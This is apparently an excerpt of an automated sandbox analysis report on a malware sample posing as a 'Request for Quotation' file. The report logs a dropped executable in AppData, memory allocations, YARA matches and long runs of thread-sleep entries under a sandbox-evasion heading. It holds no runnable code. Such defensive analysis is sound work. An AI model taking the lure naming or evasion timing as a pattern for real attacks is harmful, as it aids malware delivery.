                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 2820, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 7840000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 8840000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 89F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 99F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: 4DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 7000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 8000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 81A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 91A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 1660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 3090000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory allocated: 5090000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599763Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597653Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599671
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599558
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598905
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598796
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598575
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598451
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598316
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598187
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 598077
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597968
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597859
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597750
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597640
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597531
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597421
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597312
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597203
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 597093
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596984
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596874
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596765
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596218
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 596030
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595921
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595774
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595504
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595375
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595265
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595156
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 595046
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594936
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594828
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594718
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594609
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594500
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594390
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeThread delayed: delay time: 594281
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5592Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 800Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7075Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1061Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeWindow / User API: threadDelayed 2508Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeWindow / User API: threadDelayed 7333Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeWindow / User API: threadDelayed 2530
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeWindow / User API: threadDelayed 7328
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 4836Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4148Thread sleep count: 5592 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 800 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060Thread sleep count: 2508 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060Thread sleep count: 7333 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597653s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -596015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800Thread sleep time: -595469s >= -30000sJump to behavior
